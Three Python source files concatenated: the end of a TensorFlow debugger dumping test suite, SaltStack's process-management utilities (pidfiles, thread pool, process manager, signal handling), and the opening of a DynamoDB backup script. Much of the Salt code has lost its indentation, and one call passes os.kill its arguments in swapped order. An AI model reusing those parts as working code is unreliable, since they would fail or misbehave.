            executed_op_types.count("ReadVariableOp"), 2 * (1 + num_threads))
        for trace in graph_exec_traces:
            # These are all single-output tensors.
            self.assertEqual(trace.output_slot, 0)

        tensor_values = [reader.graph_execution_trace_to_tensor_value(trace)
                         for trace in graph_exec_traces]
        if tensor_debug_mode == "NO_TENSOR":
            for tensor_value in tensor_values:
                self.assertAllEqual(tensor_value, [])
        elif tensor_debug_mode == "CURT_HEALTH":
            for trace in graph_exec_traces:
                tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
                # 1st element: tensor ID; 2nd element: 0 indicating no inf or nan.
                self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0])
        elif tensor_debug_mode == "CONCISE_HEALTH":
            # Fix: the original looped `for tensor_value in tensor_values:` but
            # asserted on the stale `trace` variable left over from the loop
            # above, so only the last trace was actually checked (repeatedly).
            # Iterate over the traces themselves, as in the CURT_HEALTH branch.
            for trace in graph_exec_traces:
                tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
                # 1st element: tensor ID.
                # 2nd element: element count. Remaining elements: all zero because there
                # is no -inf, inf or nan.
                self.assertAllClose(trace.debug_tensor_value, [tensor_id, 1, 0, 0, 0])
        elif tensor_debug_mode == "SHAPE":
            for trace in graph_exec_traces:
                if trace.op_type == "Mul":
                    tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
                    mul_value = reader.graph_execution_trace_to_tensor_value(trace)
                    # 1st element: tensor_id, should be >= 0.
                    # 2nd element: dtype enum value (float32).
                    # 3rd element: rank.
                    # 4th element: element count.
                    self.assertAllClose(mul_value, [tensor_id, 1, 0, 1, 0, 0, 0, 0, 0, 0])
        elif tensor_debug_mode == "FULL_TENSOR":
            mul_values = [
                reader.graph_execution_trace_to_tensor_value(trace)
                for trace in graph_exec_traces if trace.op_type == "Mul"]
            self.assertAllClose(mul_values, [6.0, 6.0, 6.0, 6.0])
def testMultiThreadedDumpingWithDifferentSettings(self):
    """Two threads dump to different roots; disabling on one thread must not
    disturb the dumping already enabled by the other thread."""
    dump_root_1 = os.path.join(self.dump_root, "dump_root_1")
    dump_root_2 = os.path.join(self.dump_root, "dump_root_2")
    v1 = variables.Variable(10.0, dtype=dtypes.float32)
    v2 = variables.Variable(3.0, dtype=dtypes.float32)

    def add_negative_v1_squared_to_itself():
        writer = dumping_callback.enable_dump_debug_info(
            dump_root_1, tensor_debug_mode="FULL_TENSOR")
        # Run in a loop to facilitate interleaving between threads.
        for _ in range(3):
            v1.assign_add(-(v1 ** 2.0))
        writer.FlushNonExecutionFiles()
        writer.FlushExecutionFiles()

    def add_negative_v2_squared_to_itself():
        writer = dumping_callback.enable_dump_debug_info(
            dump_root_2, tensor_debug_mode="FULL_TENSOR")
        v2_squared = v2 ** 2.0
        # Since dumping is disabled before the Neg op is called, no tensor data
        # should be dumped from the op, but this shouldn't affect the dumping of
        # the tensor data from the Neg op in `add_negative_v1_squared_to_itself`.
        # Both behavior is checked below.
        dumping_callback.disable_dump_debug_info()
        negative_v2_squared = -v2_squared
        v2.assign_add(negative_v2_squared)
        writer.FlushNonExecutionFiles()
        writer.FlushExecutionFiles()

    # v2 is mutated on a sub-thread.
    sub_thread = threading.Thread(target=add_negative_v2_squared_to_itself)
    sub_thread.start()
    add_negative_v1_squared_to_itself()  # v1 is mutated on the main thread.
    sub_thread.join()
    # 10 - 10 * 10 = -90.
    # -90 - (-90 * -90) = -8190.
    # -8190 - (-8190 * -8190) = -67084290.
    self.assertAllClose(v1.read_value(), -67084290.0)
    self.assertAllClose(v2.read_value(), -6.0)

    with debug_events_reader.DebugDataReader(dump_root_1) as reader:
        reader.update()
        exec_digests = reader.executions(digest=True)
        v1_squared_values = [
            reader.execution_to_tensor_values(digest)
            for digest in exec_digests if digest.op_type == "Pow"]
        negative_v1_squared_values = [
            reader.execution_to_tensor_values(digest)
            for digest in exec_digests if digest.op_type == "Neg"]
        self.assertAllClose(v1_squared_values, [[100.0], [8100.0], [67076100.0]])
        self.assertAllClose(
            negative_v1_squared_values, [[-100.0], [-8100.0], [-67076100.0]])

    with debug_events_reader.DebugDataReader(dump_root_2) as reader:
        reader.update()
        exec_digests = reader.executions(digest=True)
        executed_op_types = [digest.op_type for digest in exec_digests]
        # Neg ran after disable_dump_debug_info() on the sub-thread, so it
        # must not appear in this dump root.
        self.assertNotIn("Neg", executed_op_types)
        v2_squared_values = [
            reader.execution_to_tensor_values(digest)
            for digest in exec_digests if digest.op_type == "Pow"]
        self.assertAllClose(v2_squared_values, [[9.0]])
@test_util.run_in_graph_and_eager_modes
def testNestedContextIsCapturedByGraphOpCreationHistory(self):
    """Ops from a while-loop's cond vs. body record different inner graphs."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode="NO_TENSOR")

    @def_function.function
    def iterative_doubling(x, times):
        i = constant_op.constant(0, dtype=dtypes.int32)
        while i < times:
            x = x * 2.0 - 1.0
            i += 1
        return x

    x = constant_op.constant(2.0, dtype=dtypes.float32)
    times = constant_op.constant(4, dtype=dtypes.int32)
    # 2 * 2 - 1 = 3; 3 * 2 - 1 = 5; 5 * 2 - 1 = 9; 9 * 2 - 1 = 17.
    self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 17.0)

    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()
    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
        reader.update()
        less_op_digest = reader.graph_op_digests(op_type="Less")[-1]
        mul_op_digest = reader.graph_op_digests(op_type="Mul")[-1]
        sub_op_digest = reader.graph_op_digests(op_type="Sub")[-1]
        # The Less op is from the while-loop cond context and hence should have
        # a different innermost context ID from the mul and sub ops, which are
        # both from the while-loop body context.
        self.assertNotEqual(less_op_digest.graph_id, mul_op_digest.graph_id)
        self.assertNotEqual(less_op_digest.graph_id, sub_op_digest.graph_id)
        # The Mul and Sub ops are from the same innermost context.
        self.assertEqual(mul_op_digest.graph_id, sub_op_digest.graph_id)
@parameterized.named_parameters(
    ("NoTensor", "NO_TENSOR"),
    ("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelPredict(self, tensor_debug_mode):
    """predict() on a small recurrent Keras model is dumped end to end."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode=tensor_debug_mode)
    model = _create_simple_recurrent_keras_model([3, 4])
    batch_size = 5
    xs = np.ones([batch_size, 3, 4])
    self.assertAllClose(model.predict(xs), np.zeros([batch_size, 1]))

    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()
    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
        reader.update()
        if context.executing_eagerly():
            # NOTE(b/142486213): Execution of the TF function happens with
            # Session.run() in v1 graph mode, hence it doesn't get logged to the
            # .execution file.
            self.assertTrue(reader.executions(digest=True))

        graph_exec_digests = reader.graph_execution_traces(digest=True)
        executed_op_types = [digest.op_type for digest in graph_exec_digests]
        # These are the ops that we can safely assume to have been executed during
        # the model prediction.
        self.assertIn("MatMul", executed_op_types)
        self.assertIn("BiasAdd", executed_op_types)
        # On the GPU, CudnnRNN is used in lieu of the default op-by-op
        # implementation.
        self.assertTrue(
            ("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
             "CudnnRNN" in executed_op_types))

        # Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
        # be an empty float32 tensor.
        tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
                         for digest in graph_exec_digests]
        if tensor_debug_mode == "NO_TENSOR":
            for tensor_value in tensor_values:
                self.assertAllEqual(tensor_value, [])
        else:
            # Refrain from asserting the internal implementation details of the LSTM
            # layer.
            self.assertTrue(any(
                bool(tensor_value.size) for tensor_value in tensor_values))
@parameterized.named_parameters(
    ("NoTensor", "NO_TENSOR"),
    ("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelFit(self, tensor_debug_mode):
    """fit() on a small recurrent Keras model is dumped end to end."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode=tensor_debug_mode)
    model = _create_simple_recurrent_keras_model([3, 4])
    xs = np.ones([5, 3, 4])
    ys = np.ones([5, 1])

    history = model.fit(xs, ys, epochs=3, verbose=0)
    self.assertAllClose(
        history.history["loss"], [1.0, 0.9603999853134155, 0.9223681688308716])

    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()
    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
        reader.update()
        if context.executing_eagerly():
            exec_digests = reader.executions(digest=True)
            self.assertTrue(exec_digests)
            if tensor_debug_mode == "NO_TENSOR":
                for digest in exec_digests:
                    tensor_values = reader.execution_to_tensor_values(digest)
                    for tensor_value in tensor_values:
                        # Fix: use assertAllEqual as in the sibling tests.
                        # Each value is an empty float32 ndarray, which plain
                        # assertEqual does not compare element-wise.
                        self.assertAllEqual(tensor_value, [])

        graph_exec_digests = reader.graph_execution_traces(digest=True)
        executed_op_types = [digest.op_type for digest in graph_exec_digests]
        # These are the ops that we can safely assume to have been executed during
        # the recurrent model's fit() call.
        self.assertIn("MatMul", executed_op_types)
        self.assertIn("BiasAdd", executed_op_types)
        # On the GPU, CudnnRNN is used in lieu of the default op-by-op
        # implementation.
        self.assertTrue(
            ("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
             "CudnnRNN" in executed_op_types))
        self.assertTrue(
            ("SigmoidGrad" in executed_op_types and
             "TanhGrad" in executed_op_types or
             "CudnnRNNBackprop" in executed_op_types))
        if tensor_debug_mode == "NO_TENSOR":
            for digest in graph_exec_digests:
                # Fix: graph_execution_trace_to_tensor_value() returns a single
                # (empty) ndarray. The original iterated over that empty array,
                # so its assertion body never executed. Assert on the value
                # directly, mirroring the NO_TENSOR checks elsewhere.
                tensor_value = reader.graph_execution_trace_to_tensor_value(digest)
                self.assertAllEqual(tensor_value, [])
@parameterized.named_parameters(
    ("NoTensor", "NO_TENSOR"),
    ("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testMobiletNetV2Fit(self, tensor_debug_mode):
    """Test training Keras MobileNetV2 works with dumping."""
    # Use a large circular-buffer to make sure we capture all the executed ops.
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root,
        tensor_debug_mode=tensor_debug_mode,
        circular_buffer_size=100000)
    # Truncate MobileNetV2 at layer 22 and attach a small Flatten + Dense
    # head, keeping the test model (and the test's runtime) small.
    model = mobilenet_v2.MobileNetV2(
        input_shape=(32, 32, 3), alpha=0.1, weights=None)
    y = model.layers[22].output
    y = core.Flatten()(y)
    y = core.Dense(1)(y)
    model = models.Model(inputs=model.inputs, outputs=y)

    batch_size = 2
    xs = np.zeros([batch_size] + list(model.input_shape[1:]))
    ys = np.zeros([batch_size] + list(model.output_shape[1:]))
    model.compile(optimizer="sgd", loss="mse")

    epochs = 1
    history = model.fit(xs, ys, epochs=epochs, verbose=0)
    self.assertLen(history.history["loss"], epochs)

    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()

    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
        reader.update()
        if context.executing_eagerly():
            # NOTE(b/142486213): Execution of the TF function happens with
            # Session.run() in v1 graph mode, hence it doesn't get logged to the
            # .execution file.
            exec_digests = reader.executions(digest=True)
            self.assertTrue(exec_digests)

        graph_exec_digests = reader.graph_execution_traces()
        executed_op_types = [digest.op_type for digest in graph_exec_digests]
        # These are the ops that we can safely assume to have been executed during
        # the model's fit() call.
        self.assertIn("Conv2D", executed_op_types)
        self.assertIn("Relu6", executed_op_types)
        self.assertIn("Conv2DBackpropFilter", executed_op_types)
        self.assertIn("Relu6Grad", executed_op_types)
        if tensor_debug_mode == "NO_TENSOR":
            # Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
            # to be an empty float32 tensor.
            tensor_values = [
                reader.graph_execution_trace_to_tensor_value(digest)
                for digest in graph_exec_digests]
            for tensor_value in tensor_values:
                self.assertAllEqual(tensor_value, [])
        elif tensor_debug_mode == "FULL_TENSOR":
            # Forward-pass activations: rank > 1 and a leading batch dimension.
            conv2d_values = [
                reader.graph_execution_trace_to_tensor_value(digest)
                for digest in graph_exec_digests if digest.op_type == "Conv2D"]
            self.assertTrue(conv2d_values)
            for conv2d_value in conv2d_values:
                self.assertGreater(len(conv2d_value.shape), 1)
                self.assertEqual(conv2d_value.shape[0], batch_size)
            relu6_values = [
                reader.graph_execution_trace_to_tensor_value(digest)
                for digest in graph_exec_digests if digest.op_type == "Relu6"]
            self.assertTrue(relu6_values)
            for relu6_value in relu6_values:
                self.assertGreater(len(relu6_value.shape), 1)
                self.assertEqual(relu6_value.shape[0], batch_size)
            # Backward-pass tensors: only rank is asserted here.
            conv2d_bp_filter_values = [
                reader.graph_execution_trace_to_tensor_value(digest)
                for digest in graph_exec_digests
                if digest.op_type == "Conv2DBackpropFilter"]
            self.assertTrue(conv2d_bp_filter_values)
            for conv2d_bp_filter_value in conv2d_bp_filter_values:
                self.assertGreater(len(conv2d_bp_filter_value.shape), 1)
            relu6_grad_values = [
                reader.graph_execution_trace_to_tensor_value(digest)
                for digest in graph_exec_digests if digest.op_type == "Relu6Grad"]
            self.assertTrue(relu6_grad_values)
            for relu6_grad_value in relu6_grad_values:
                self.assertGreater(len(relu6_grad_value.shape), 1)
if __name__ == "__main__":
    # These tests target TF2-style eager execution by default.
    ops.enable_eager_execution()
    googletest.main()
|
process.py | # -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import os
import sys
import time
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
    '''
    Invoke the systemd-notify(1) helper with ``action`` and report whether
    it exited successfully (exit code 0).
    '''
    proc = subprocess.Popen(
        ['systemd-notify', action],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
    # Wait for the helper to finish; its output is captured and discarded.
    proc.communicate()
    return proc.poll() == 0
def notify_systemd():
    '''
    Notify systemd that this process has started.

    Prefers the python-systemd bindings; if they are unavailable, falls back
    to shelling out to systemd-notify(1). Returns True/False for the
    fallback path.
    '''
    try:
        import systemd.daemon
    except ImportError:
        # No python bindings: fall back to the CLI helper, but only if it
        # exists and reports that the system was booted with systemd.
        if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
            return systemd_notify_call('--ready')
        return False

    if systemd.daemon.booted():
        try:
            return systemd.daemon.notify('READY=1')
        except SystemError:
            # Daemon was not started by systemd
            pass
    # NOTE(review): implicitly returns None (falsy) when the bindings import
    # but the system was not booted with systemd, or when notify() raises
    # SystemError — callers should treat the result as truthy/falsy only.
def set_pidfile(pidfile, user):
    '''
    Write the current process's PID to ``pidfile`` and, on POSIX systems,
    chown the file to ``user``.

    Exits the process with EX_NOUSER if the user does not exist, or with
    the chown errno if changing ownership fails. Returns True on Windows
    (where no ownership change is attempted).
    '''
    pdir = os.path.dirname(pidfile)
    if not os.path.isdir(pdir) and pdir:
        os.makedirs(pdir)
    try:
        with salt.utils.fopen(pidfile, 'w+') as ofile:
            ofile.write(str(os.getpid()))
    except IOError:
        pass
    else:
        # Only log success when the write actually succeeded (the original
        # logged unconditionally, even after a swallowed IOError).
        log.debug('Created pidfile: {0}'.format(pidfile))

    if salt.utils.is_windows():
        return True

    import pwd  # after confirming not running Windows
    #import grp
    try:
        pwnam = pwd.getpwnam(user)
        uid = pwnam[2]
        gid = pwnam[3]
        #groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
    except (KeyError, IndexError):
        # Fix: pwd.getpwnam raises KeyError for an unknown user, so the
        # original `except IndexError` never matched and the error below was
        # unreachable. IndexError is kept for safety.
        sys.stderr.write(
            'Failed to set the pid to user: {0}. The user is not '
            'available.\n'.format(
                user
            )
        )
        sys.exit(salt.defaults.exitcodes.EX_NOUSER)

    if os.getuid() == uid:
        # The current user already owns the pidfile. Return!
        return

    try:
        os.chown(pidfile, uid, gid)
    except OSError as err:
        msg = (
            'Failed to set the ownership of PID file {0} to user {1}.'.format(
                pidfile, user
            )
        )
        log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
        sys.stderr.write('{0}\n'.format(msg))
        sys.exit(err.errno)
    log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
    '''
    Determine if a pidfile has been written out
    '''
    # isfile() is False for missing paths and for directories alike.
    return os.path.isfile(pidfile)
def get_pidfile(pidfile):
    '''
    Return the pid from a pidfile as an integer
    '''
    # int() tolerates surrounding whitespace/newlines in the file contents.
    with salt.utils.fopen(pidfile) as pid_fh:
        return int(pid_fh.read())
def clean_proc(proc, wait_for_kill=10):
    '''
    Generic method for cleaning up multiprocessing procs.

    Repeatedly calls terminate() in 0.1s steps while the process is alive;
    after ``wait_for_kill`` attempts, escalates to SIGKILL.
    '''
    # NoneType and other fun stuff need not apply
    if not proc:
        return
    try:
        waited = 0
        while proc.is_alive():
            proc.terminate()
            waited += 1
            time.sleep(0.1)
            if proc.is_alive() and (waited >= wait_for_kill):
                log.error(
                    'Process did not die with terminate(): {0}'.format(
                        proc.pid
                    )
                )
                os.kill(proc.pid, signal.SIGKILL)
    except (AssertionError, AttributeError):
        # Catch AssertionError when the proc is evaluated inside the child
        # Catch AttributeError when the process dies between proc.is_alive()
        # and proc.terminate() and turns into a NoneType
        pass
def os_is_running(pid):
    '''
    Use OS facilities to determine if a process is running
    '''
    # Accept string PIDs for convenience.
    if isinstance(pid, six.string_types):
        pid = int(pid)

    if HAS_PSUTIL:
        return psutil.pid_exists(pid)

    # Fallback: signal 0 performs the existence/permission check without
    # actually delivering a signal to the process.
    try:
        os.kill(pid, 0)
    except OSError:
        return False
    return True
class ThreadPool(object):
    '''
    This is a very VERY basic threadpool implementation
    This was made instead of using multiprocessing ThreadPool because
    we want to set max queue size and we want to daemonize threads (neither
    is exposed in the stdlib version).

    Since there isn't much use for this class as of right now this implementation
    Only supports daemonized threads and will *not* return results

    TODO: if this is found to be more generally useful it would be nice to pull
    in the majority of code from upstream or from http://bit.ly/1wTeJtM
    '''
    def __init__(self,
                 num_threads=None,
                 queue_size=0):
        # if no count passed, default to number of CPUs
        if num_threads is None:
            num_threads = multiprocessing.cpu_count()
        self.num_threads = num_threads

        # create a task queue of queue_size
        # (a queue_size of 0 means the queue is unbounded)
        self._job_queue = queue.Queue(queue_size)

        self._workers = []

        # create worker threads
        for _ in range(num_threads):
            thread = threading.Thread(target=self._thread_target)
            # daemonized so workers die with the parent process
            thread.daemon = True
            thread.start()
            self._workers.append(thread)

    # intentionally not called "apply_async" since we aren't keeping track of
    # the return at all, if we want to make this API compatible with multiprocessing
    # threadpool we can in the future, and we won't have to worry about name collision
    def fire_async(self, func, args=None, kwargs=None):
        # Enqueue func(*args, **kwargs) for a worker thread; returns True if
        # it was enqueued, False if the (bounded) queue is full.
        if args is None:
            args = []
        if kwargs is None:
            kwargs = {}
        try:
            self._job_queue.put_nowait((func, args, kwargs))
            return True
        except queue.Full:
            return False

    def _thread_target(self):
        # Worker loop: pull jobs off the queue forever; exceptions raised by
        # a job are logged and swallowed so the worker survives.
        while True:
            # 1s timeout so that if the parent dies this thread will die within 1s
            try:
                try:
                    func, args, kwargs = self._job_queue.get(timeout=1)
                    self._job_queue.task_done()  # Mark the task as done once we get it
                except queue.Empty:
                    continue
            except AttributeError:
                # During shutdown, `queue` may not have an `Empty` attribute. Thusly,
                # we have to catch a possible exception from our exception handler in
                # order to avoid an unclean shutdown. Le sigh.
                continue

            try:
                log.debug('ThreadPool executing func: {0} with args:{1}'
                          ' kwargs{2}'.format(func, args, kwargs))
                func(*args, **kwargs)
            except Exception as err:
                log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
# Need to ensure that 'log_queue' is correctly transfered to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal):
for pid in self._process_map:
os.kill(pid, signal)
@gen.coroutine
def run(self, async=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.debug('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows() and not async:
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
self.restart_process(pid)
elif async is True:
yield gen.sleep(10)
elif async is False:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
if args:
# escalate the signal to the process
os.kill(pid, args[0])
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno != 3:
raise
del self._process_map[pid]
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
# if anyone is done after
for pid in self._process_map:
try:
os.kill(signal.SIGKILL, pid)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
    '''
    multiprocessing.Process subclass that wires salt's multiprocessing
    logging into the child process after fork.
    '''
    def __init__(self, *args, **kwargs):
        # 'log_queue' may be passed explicitly (needed where the queue cannot
        # be inherited implicitly); otherwise fetch the shared queue.
        self.log_queue = kwargs.pop('log_queue', None)
        if self.log_queue is None:
            self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
        # Re-establish process logging in the forked child, and make sure
        # multiprocessing logging is shut down on finalization.
        multiprocessing.util.register_after_fork(self, MultiprocessingProcess.__setup_process_logging)
        multiprocessing.util.Finalize(self, salt.log.setup.shutdown_multiprocessing_logging, exitpriority=16)
        super(MultiprocessingProcess, self).__init__(*args, **kwargs)

    def __setup_process_logging(self):
        # Runs in the child after fork (see register_after_fork above).
        salt.log.setup.setup_multiprocessing_logging(self.log_queue)
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
    '''
    MultiprocessingProcess that installs SIGINT/SIGTERM handlers in the
    child process which log the signal and exit cleanly.
    '''
    def __init__(self, *args, **kwargs):
        # Signal handlers must be (re-)installed in the child after fork.
        multiprocessing.util.register_after_fork(self, SignalHandlingMultiprocessingProcess.__setup_signals)
        super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)

    def __setup_signals(self):
        signal.signal(signal.SIGINT, self._handle_signals)
        signal.signal(signal.SIGTERM, self._handle_signals)

    def _handle_signals(self, signum, sigframe):
        msg = '{0} received a '.format(self.__class__.__name__)
        if signum == signal.SIGINT:
            msg += 'SIGINT'
        elif signum == signal.SIGTERM:
            msg += 'SIGTERM'
        msg += '. Exiting'
        log.debug(msg)
        # Fix: use sys.exit() rather than the exit() builtin, which is
        # injected by the site module and is not guaranteed to exist
        # (e.g. when Python runs with -S).
        sys.exit(0)

    def start(self):
        # Start the child with default signal dispositions so it does not
        # run with this process's handlers before installing its own.
        with default_signals(signal.SIGINT, signal.SIGTERM):
            super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
    '''
    Context manager that temporarily resets the given signal numbers to
    their default dispositions (SIG_DFL), restoring the previous handlers
    on exit.

    :param signals: signal numbers (e.g. signal.SIGINT) to reset
    '''
    old_signals = {}
    for signum in signals:
        old_signals[signum] = signal.getsignal(signum)
        signal.signal(signum, signal.SIG_DFL)

    try:
        # Do whatever is needed with the reset signals
        yield
    finally:
        # Fix: restore in a finally block so the previous handlers come back
        # even if the body of the with-statement raises (the original left
        # SIG_DFL installed on exception).
        for signum, old_handler in old_signals.items():
            signal.signal(signum, old_handler)
|
dynamodump.py | #!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with dynalite).
"""
import argparse
import fnmatch
import json
import logging
import os
import shutil
import threading
import datetime
import errno
import sys
import time
import re
import zipfile
import tarfile
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
except ImportError:
from urllib2 import urlopen, URLError, HTTPError
import boto.dynamodb2.layer1
from boto.dynamodb2.exceptions import ProvisionedThroughputExceededException
import botocore
import boto3
# Tunables and constants for dump/restore behavior.
JSON_INDENT = 2
AWS_SLEEP_INTERVAL = 10  # seconds
LOCAL_SLEEP_INTERVAL = 1  # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15  # seconds
MAX_BATCH_WRITE = 25  # DynamoDB limit
SCHEMA_FILE = "schema.json"  # per-table schema dump filename
DATA_DIR = "data"  # per-table data subdirectory name
MAX_RETRY = 6
LOCAL_REGION = "local"  # sentinel region for local DynamoDB instances
LOG_LEVEL = "INFO"
DATA_DUMP = "dump"
RESTORE_WRITE_CAPACITY = 25
THREAD_START_DELAY = 1  # seconds
CURRENT_WORKING_DIR = os.getcwd()
DEFAULT_PREFIX_SEPARATOR = "-"
MAX_NUMBER_BACKUP_WORKERS = 25
# EC2 instance metadata endpoint, used to discover the region when it is not
# provided explicitly or via AWS_DEFAULT_REGION.
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
def _get_aws_client(profile, region, service):
    """
    Build connection to some AWS service.

    Region resolution order: explicit ``region`` argument, then the
    AWS_DEFAULT_REGION environment variable, then the EC2 instance
    metadata service (availability zone minus its trailing letter).
    """
    aws_region = region or os.getenv("AWS_DEFAULT_REGION")
    if not aws_region:
        # Fallback to querying metadata for region
        try:
            azone = urlopen(METADATA_URL + "placement/availability-zone",
                            data=None, timeout=5).read().decode()
        except URLError:
            # NOTE: HTTPError subclasses URLError, so this clause also
            # catches HTTP errors; the branch below appears unreachable.
            logging.exception("Timed out connecting to metadata service.\n\n")
            sys.exit(1)
        except HTTPError as e:
            logging.exception("Error determining region used for AWS client. Typo in code?\n\n" +
                              str(e))
            sys.exit(1)
